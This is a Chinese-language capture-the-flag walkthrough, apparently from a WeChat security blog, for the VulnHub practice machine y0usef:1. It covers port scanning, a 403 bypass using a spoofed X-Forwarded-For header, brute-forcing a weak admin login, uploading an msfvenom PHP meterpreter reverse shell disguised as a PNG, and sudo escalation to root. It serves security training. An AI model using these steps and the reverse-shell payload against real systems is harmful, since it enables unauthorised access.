点击蓝字
关注我们
0x00
靶机信息
靶机:y0usef:1
难度:简单
下载:https://www.vulnhub.com/entry/y0usef-1,624/
0x01
靶机信息
arp-scan-l
Nmap扫描端口
nmap-p 1-65535 192.168.5.217
只开放了22,80端口
然而Dirb扫描不到目录的可能字典原因
使用Dirbsearch扫描目录
Python3 dirsearch.py -u http://192.168.5.217 -e php
发现3个页面,后面两个访问页面都一样,访问adminstration页面时出现你没有访问文件权限扫描时403响应应该资源是存在需要特定条件才能访问到
尝试在请求头加个请求IP绕过启动Burp Suite抓包进行改请求头为本地地址访问
x-forwarede-for: 127.0.0.1
点击发送后果然显示出登录页面了
由于只开放了两个端口没什么可以利用的信息只能爆破账号密码
爆破使用弱口令top100字典即可开始结果账号密码全都时admin惊呼
然后直接输入账号密码登录记得请求头加伪造本地IP地址,登录成功后会发现有个上传文件地方
0x02
漏洞利用
使用msfvenom生成一个php木马
msfvenom -p php/meterpreter_reverse_tcp LHOST=攻击机IP LPORT=连接端口 -f raw >shell.php
用msfvenom生成php木马记得去除生成木马前面注释符
然后将木马文件伪装成图片然后上传
mv shell.phpshell.png
上传完成回显了路径
上传成功后启动msfconsole进入监听模块加载生成木马的payload然后设置生成马的攻击机IP以及监听端口开启攻击
接下来访问上传木马文件路径
msfconsloe上线然后查看权限以及反弹真实终端
python-c 'import pty;pty.spawn("/bin/bash")'
访问/home目录查看到一个user.txt文件内容是Base64加密的直接使用Burp Suite解密是一个ssh用户账号和密码
账号密码为yousef和yousef123
直接ssh输入账号密码登录但无法访问/root目录需要进行提权
ssh yousef@192.168.5.217
0x03
靶机提权
直接sudo -l一下结果直接输入的是登录用户密码就验证成功了
然后sudo su切换用户就切换到root用户直接进入root目录下查看user.txt文件提权到此结束
往期推荐 ·
本文始发于微信公众号(信安小屋):Vulnhub篇 y0usef:1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论